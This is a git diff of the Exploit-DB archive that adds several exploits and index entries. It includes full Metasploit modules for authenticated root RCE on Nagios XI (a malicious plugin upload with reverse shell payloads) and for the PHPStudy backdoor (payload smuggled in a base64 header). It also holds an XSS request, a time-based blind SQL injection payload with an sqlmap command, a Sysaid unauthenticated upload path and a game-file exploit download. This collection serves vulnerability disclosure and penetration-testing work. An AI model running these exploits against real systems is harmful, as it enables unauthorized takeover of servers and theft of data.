diff --git a/exploits/java/webapps/48188.txt b/exploits/java/webapps/48188.txt
new file mode 100644
index 000000000..b937f633e
--- /dev/null
+++ b/exploits/java/webapps/48188.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
+# Google Dork: intext:"Help Desk Software by SysAid "
+# Date: 2020-03-09
+# Exploit Author: Ahmed Sherif
+# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
+# Software Link: [https://www.sysaid.com/free-help-desk-software
+# Version: Sysaid v20.1.11 b26
+# Tested on: Windows Server 2016
+# CVE : None
+
+GhostCat Attack
+
+The default
+installation of Sysaid is enabling the exposure of AJP13 protocol which is used
+by tomcat instance, this vulnerability has been released recently on
+different blogposts
+.
+
+
+*Proof-of-Concept*
+
+[image: image.png]
+
+The
+attacker would be able to exploit the vulnerability and read the Web.XML of
+Sysaid.
+Unauthenticated File Upload
+
+It was
+found on the Sysaid application that an attacker would be able to upload files
+without authenticated by directly access the below link:
+
+http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=
+
+
+
+In the above screenshot, it shows that an attacker can execute commands
+in the system without any prior authentication to the system.
\ No newline at end of file
diff --git a/exploits/linux/remote/48191.rb b/exploits/linux/remote/48191.rb
new file mode 100755
index 000000000..52b5f42fb
--- /dev/null
+++ b/exploits/linux/remote/48191.rb
@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Nagios XI Authenticated Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in Nagios XI before 5.6.6 in
+ order to execute arbitrary commands as root.
+
+ The module uploads a malicious plugin to the Nagios XI server and then
+ executes this plugin by issuing an HTTP GET request to download a
+ system profile from the server. For all supported targets except Linux
+ (cmd), the module uses a command stager to write the exploit to the
+ target via the malicious plugin. This may not work if Nagios XI is
+ running in a restricted Unix environment, so in that case the target
+ must be set to Linux (cmd). The module then writes the payload to the
+ malicious plugin while avoiding commands that may not be supported.
+
+ Valid credentials for a user with administrative privileges are
+ required. This module was successfully tested on Nagios XI 5.6.5
+ running on CentOS 7. The module may behave differently against older
+ versions of Nagios XI. See the documentation for more information.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jak Gibb', # https://github.com/jakgibb/ - Discovery and exploit
+ 'Erik Wynter' # @wyntererik - Metasploit
+ ],
+ 'References' =>
+ [
+ ['CVE', '2019-15949'],
+ ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
+ ],
+ 'Payload' => { 'BadChars' => "\x00" },
+ 'Targets' =>
+ [
+ [ 'Linux (x86)', {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+ }
+ } ],
+ [ 'Linux (x64)', {
+ 'Arch' => ARCH_X64,
+ 'Platform' => 'linux',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+ }
+ } ],
+ [ 'Linux (cmd)', {
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ },
+ 'Payload' => {
+ 'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
+ 'BadChars' => "\""
+ }
+ } ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jul 29 2019',
+ 'DefaultOptions' => {
+ 'RPORT' => 80,
+ 'HttpClientTimeout' => 2, #This is needed to close the connection to the server following the system profile download request.
+ 'WfsDelay' => 10
+ },
+ 'DefaultTarget' => 1))
+ register_options [
+ OptString.new('TARGETURI', [true, 'Base path to NagiosXI', '/']),
+ OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+ OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+ ]
+
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ]
+ import_target_defaults
+ end
+
+ def check
+ vprint_status("Running check")
+
+ #visit Nagios XI login page to obtain the nsp value required for authentication
+ res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php')
+
+ unless res
+ return CheckCode::Unknown('Connection failed')
+ end
+
+ unless res.code == 200 && res.body.include?('Nagios XI')
+ return CheckCode::Safe('Target is not a Nagios XI application.')
+ end
+
+ @nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+
+ if @nsp.to_s.eql? ''
+ return CheckCode::NoAccess, 'Could not retrieve nsp value, making authentication impossible.'
+ end
+
+ #Attempt to authenticate
+ @username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+ cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+
+ auth_res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php'),
+ 'method' => 'POST',
+ 'cookie' => cookie,
+ 'vars_post' => {
+ nsp: @nsp,
+ page: 'auth',
+ debug: '',
+ pageopt: 'login',
+ username: @username,
+ password: password,
+ loginButton: ''
+ }
+ })
+
+ unless auth_res
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless auth_res.code == 302 && auth_res.headers['Location'] == "index.php"
+ fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+ end
+
+ #Check Nagios XI version - this requires a separate request because following the redirect doesn't work
+ @cookie = auth_res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+ @cookie = @cookie.split().last #app returns 3 cookies, we need only the last one
+ version_check = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/index.php'),
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'nsp' => @nsp
+ })
+
+ unless version_check
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless version_check.code == 200 && version_check.body.include?('Home Dashboard')
+ fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+ end
+
+ @version = version_check.body.scan(/product=nagiosxi&version=(\d+\.\d+\.\d+)/).flatten.first rescue ''
+ if @version.to_s.eql? ''
+ return CheckCode::Detected('Could not determine Nagios XI version.')
+ end
+
+ @version = Gem::Version.new @version
+
+ unless @version <= Gem::Version.new('5.6.5')
+ return CheckCode::Safe("Target is Nagios XI with version #{@version}.")
+ end
+
+ CheckCode::Appears("Target is Nagios XI with version #{@version}.")
+ end
+
+ def check_plugin_permissions
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'nsp' => @nsp
+ })
+
+ unless res
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless res.code == 200 && res.body.include?('Manage Plugins')
+ fail_with(Failure::NoAccess, "The user #{@username} does not have permission to edit plugins, which is required for the exploit to work.")
+ end
+
+ @plugin_nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+ if @plugin_nsp.to_s.eql? ''
+ fail_with Failure::NoAccess, 'Failed to obtain the nsp value required for the exploit to work.'
+ end
+
+ @plugin_cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+ end
+
+ def execute_command(cmd, opts = {})
+ print_status("Uploading malicious 'check_ping' plugin...")
+ boundary = rand_text_numeric(14)
+ post_data = "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"upload\"\n\n1\n"
+ post_data << "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"nsp\"\n\n"
+ post_data << "#{@plugin_nsp}\n"
+ post_data << "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n"
+ post_data << "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\n" #the exploit doesn't work with a random filename
+ post_data << "Content-Type: text/plain\n\n"
+ post_data << "#{cmd}\n"
+ post_data << "-----------------------------#{boundary}--\n"
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+ 'method' => 'POST',
+ 'ctype' => "multipart/form-data; boundary=---------------------------#{boundary}", #this needs to be specified here, otherwise the default value is sent in the header
+ 'cookie' => @plugin_cookie,
+ 'data' => post_data
+ })
+
+ unless res
+ fail_with Failure::Unreachable, 'Upload failed'
+ end
+
+ unless res.code == 200 && res.body.include?('New plugin was installed successfully')
+ fail_with Failure::Unknown, 'Failed to upload plugin.'
+ end
+
+ @plugin_installed = true
+ end
+
+ def execute_payload #This request will timeout. It has to, for the exploit to work.
+ print_status("Executing plugin...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/includes/components/profile/profile.php'),
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'vars_get' => { cmd: 'download' }
+ })
+ end
+
+ def cleanup()
+ return unless @plugin_installed
+
+ print_status("Deleting malicious 'check_ping' plugin...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+ 'method' => 'GET',
+ 'cookie' => @plugin_cookie,
+ 'vars_get' => {
+ delete: 'check_ping',
+ nsp: @plugin_nsp
+ }
+ })
+
+ unless res
+ print_warning("Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual cleanup is required.")
+ return
+ end
+
+ unless res.code == 200 && res.body.include?('Plugin deleted')
+ print_warning("Failed to delete the malicious 'check_ping' plugin. Manual cleanup is required.")
+ return
+ end
+
+ print_good("Plugin deleted.")
+ end
+
+ def exploit
+ unless [CheckCode::Detected, CheckCode::Appears].include? check
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if @version
+ print_status("Found Nagios XI application with version #{@version}.")
+ end
+
+ check_plugin_permissions
+ vprint_status("User #{@username} has the required permissions on the target.")
+
+ if target.arch.first == ARCH_CMD
+ execute_command(payload.encoded)
+ message = "Waiting for the payload to connect back..."
+ else
+ execute_cmdstager(background: true)
+ message = "Waiting for the plugin to request the final payload..."
+ end
+ print_good("Successfully uploaded plugin.")
+ execute_payload
+ print_status "#{message}"
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/local/48187.txt b/exploits/multiple/local/48187.txt
new file mode 100644
index 000000000..17ae14fb6
--- /dev/null
+++ b/exploits/multiple/local/48187.txt
@@ -0,0 +1,3 @@
+So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48187.bsp
\ No newline at end of file
diff --git a/exploits/php/remote/48192.rb b/exploits/php/remote/48192.rb
new file mode 100755
index 000000000..7c688696e
--- /dev/null
+++ b/exploits/php/remote/48192.rb
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "PHPStudy Backdoor Remote Code execution",
+ 'Description' => %q{
+ This module can detect and exploit the backdoor of PHPStudy.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Dimensional', #POC
+ 'Airevan' #Metasploit Module
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['PHPStudy 2016-2018', {}]
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Sep 20 2019",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path', '/'])
+ ])
+ end
+ def check
+ uri = target_uri.path
+ fingerprint = Rex::Text.rand_text_alpha(8)
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'headers' => {
+ 'Accept-Encoding' => 'gzip,deflate',
+ 'Accept-Charset' => Rex::Text.encode_base64("echo '#{fingerprint}';")
+ }
+ })
+
+ if res && res.code == 200 && res.body.to_s.include?(fingerprint)
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+ def exploit
+ uri = target_uri.path
+ print_good("Sending shellcode")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'headers' => {
+ 'Accept-Encoding' => 'gzip,deflate',
+ 'Accept-Charset' => Rex::Text.encode_base64(payload.encoded)
+ }
+ })
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48177.txt b/exploits/php/webapps/48177.txt
index e523d7736..6246c0928 100644
--- a/exploits/php/webapps/48177.txt
+++ b/exploits/php/webapps/48177.txt
@@ -1,6 +1,6 @@
-# Exploit Title: 60CycleCMS 2.5.2 - 'news.php' SQL Injection
+# Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability
# Google Dork: N/A
-# Date: 2020-03-07
+# Date: 2020-02-10
# Exploit Author: Unkn0wn
# Vendor Homepage: http://davidvg.com/
# Software Link: https://www.opensourcecms.com/60cyclecms
@@ -15,53 +15,49 @@ in file /common/lib.php Line 64 -73
*
function getCommentsLine($title)
{
-=09$title =3D addslashes($title);
-=09$query =3D "SELECT `timestamp` FROM `comments` WHERE entry_id=3D '$title=
-'";
-=09// query MySQL server
-=09$result=3Dmysql_query($query) or die("MySQL Query fail: $query");=09
-=09$numComments =3D mysql_num_rows($result);
-=09$encTitle =3D urlencode($title);
-=09return '' . $num=
-Comments . ' comments';=09
+$title = addslashes($title);
+$query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'";
+// query MySQL server
+$result=mysql_query($query) or die("MySQL Query fail: $query");
+$numComments = mysql_num_rows($result);
+$encTitle = urlencode($title);
+return '' . $numComments . ' comments';
}
lib.php line 44:
*
-=09$query =3D "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `en=
-try_id` =3D'$title' ORDER BY `timestamp` ASC";
+$query = "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `entry_id` ='$title' ORDER BY `timestamp` ASC";
*
*
news.php line 3:
*
require 'common/lib.php';
-*=20
+*
Then in line 15 return query us:
*
-$query =3D "SELECT MAX(`timestamp`) FROM `entries
+$query = "SELECT MAX(`timestamp`) FROM `entries
*
-http://127.0.0.1/news.php?title=3D$postName[SQL Injection]
+http://127.0.0.1/news.php?title=$postName[SQL Injection]
----------------------------
Cross Site-Scripting vulnerability:
File news.php in line: 136-138 :
*
-$ltsu =3D $_GET["ltsu"];
-$etsu =3D $_GET["etsu"];
-$post =3D $_GET["post"];
+$ltsu = $_GET["ltsu"];
+$etsu = $_GET["etsu"];
+$post = $_GET["post"];
*
get payload us and printEnerty.php file in line 26-27:
*
-Older=
- >';
-Oldest &g=
-t;>|';=20
+Older >';
+Oldest >>|';
*
print it for us!
-http://127.0.0.1/index.php?etsu=3D[XSS Payloads]
-http://127.0.0.1/index.php?ltsu=3D[XSS Payloads]
+http://127.0.0.1/index.php?etsu=[XSS Payloads]
+http://127.0.0.1/index.php?ltsu=[XSS Payloads]
----------------------------------------------------------
-
+# Contact : 0x9a@tuta.io
+# Visit: https://t.me/l314XK205E
# @ 2010 - 2020
# Underground Researcher
\ No newline at end of file
diff --git a/exploits/php/webapps/48189.txt b/exploits/php/webapps/48189.txt
new file mode 100644
index 000000000..9bbff9866
--- /dev/null
+++ b/exploits/php/webapps/48189.txt
@@ -0,0 +1,34 @@
+# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-03-10
+# Exploit Author: En
+# Vendor Homepage: https://github.com/yzmcms/yzmcms
+# Software Link: https://github.com/yzmcms/yzmcms
+# Version: V5.5
+# Category: Web Application
+# Patched Version: unpatched
+# Tested on: Win10x64
+# Platform: PHP
+# CVE : N/A
+#Exploit Author: En_dust
+
+#Description:
+#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
+
+
+#PoC:
+POST /yzmcms/link/link/add.html HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://127.0.0.1/yzmcms/link/link/add.html
+Content-Length: 130
+Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
+DNT: 1
+Connection: close
+
+name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
\ No newline at end of file
diff --git a/exploits/php/webapps/48190.txt b/exploits/php/webapps/48190.txt
new file mode 100644
index 000000000..7df6fc954
--- /dev/null
+++ b/exploits/php/webapps/48190.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection
+# Data: 2020-03-09
+# Exploit Author: S3FFR
+# Vendor HomagePage: http://download.freescript.ir/scripts/Persian-VIP-Download(FreeScript.ir).zip
+# Version: = 1.0 [Final Version]
+# Tested on: Windows,Linux
+# Google Dork: N/A
+
+
+=======================
+Vulnerable Page:
+
+/cart_edit.php
+
+=======================
+
+Vulnerable Source:
+
+89: mysql_query $user_p = mysql_fetch_array(mysql_query("SELECT * FROM `users` where id='$active'"));
+71: $active = $_GET['active'];
+
+======================
+sqlmap:
+
+sqlmap -u "http://target.com/cart_edit.php?active=1" -p active --cookie=[COOKIE] --technique=T --dbs
+=======================
+
+Testing Method :
+
+ - time-based blind
+
+Parameter: active (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: active=1' AND (SELECT 4169 FROM (SELECT(SLEEP(5)))wAin) AND 'zpth'='zpth
+
+========================
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 592411073..5ec3ec7e6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10986,6 +10986,7 @@ id,file,description,date,author,type,platform,port
48174,exploits/windows/local/48174.txt,"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,
48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
+48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18036,6 +18037,8 @@ id,file,description,date,author,type,platform,port
48183,exploits/multiple/remote/48183.rb,"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)",2020-03-09,Metasploit,remote,multiple,
48184,exploits/multiple/remote/48184.rb,"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
+48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
+48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42449,3 +42452,6 @@ id,file,description,date,author,type,platform,port
48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,
48176,exploits/multiple/webapps/48176.py,"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution",2019-12-12,mr_me,webapps,multiple,
48179,exploits/php/webapps/48179.txt,"Sentrifugo HRMS 3.2 - 'id' SQL Injection",2020-03-09,minhnb,webapps,php,
+48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
+48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
+48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,